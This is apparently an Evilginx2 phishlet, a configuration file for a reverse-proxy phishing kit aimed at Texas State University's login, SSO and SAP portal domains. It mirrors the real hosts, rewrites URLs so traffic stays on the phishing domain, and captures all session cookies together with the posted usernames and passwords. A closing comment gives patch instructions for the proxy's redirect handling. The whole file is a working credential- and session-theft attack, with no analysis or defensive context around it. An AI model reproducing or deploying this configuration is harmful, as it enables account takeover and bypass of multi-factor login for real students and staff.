author: '@none' min_ver: '2.3.0' proxy_hosts: - {phish_sub: 'www', orig_sub: 'www', domain: 'txstate.edu', session: true, is_landing: true} - {phish_sub: '', orig_sub: '', domain: 'txstate.edu', session: true, is_landing: false} - {phish_sub: 'authentic', orig_sub: 'authentic', domain: 'txstate.edu', session: true, is_landing: false} - {phish_sub: 'ibis.sap', orig_sub: 'ibis.sap', domain: 'txstate.edu', session: true, is_landing: false} - {phish_sub: 'tim', orig_sub: 'tim', domain: 'txstate.edu', session: true, is_landing: false} sub_filters: - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https://authentic.txstate.edu:443', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https%3A%2F%2Fauthentic.txstate.edu:443', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'authentic.txstate.edu:443', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'ibis.sap.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'www.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: '', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'www', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'authentic', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'ibis.sap', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} - {triggers_on: 'authentic.txstate.edu', orig_sub: 'tim', domain: 'txstate.edu', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']} auth_tokens: - domain: '.txstate.edu' keys: ['.*,regexp'] - domain: 'authentic.txstate.edu' keys: ['.*,regexp'] - domain: '.authentic.txstate.edu' keys: ['.*,regexp'] - domain: 'ibis.sap.txstate.edu' keys: ['.*,regexp'] - domain: 'tim.txstate.edu' keys: ['.*,regexp'] - domain: 'www.txstate.edu' keys: ['.*,regexp'] credentials: username: key: 'j_username' search: '(.*)' type: 'post' password: key: 'j_password' search: '(.*)' type: 'post' login: domain: 'ibis.sap.txstate.edu' path: '/irj/portal' # MODIFY http_proxy.go file from line 640 # // if "Location" header is present, make sure to redirect to the phishing domain # r_url, err := resp.Location() # # if err == nil { # if r_url.Host == "authentic.txstate.edu:443" { # log.Debug("Location Header Detected ... Trying To Replace it") # # if r_host, ok := p.replaceHostWithPhished("authentic.txstate.edu"); ok { # r_url := strings.Replace(r_url.String(), "authentic.txstate.edu", r_host, -1) # log.Debug("Location Header Replaced with : %s", r_url) # resp.Header.Set("location", r_url) # } # } # if r_host, ok := p.replaceHostWithPhished(r_url.Host); ok { # r_url.Host = r_host # resp.Header.Set("Location", r_url.String()) # } # }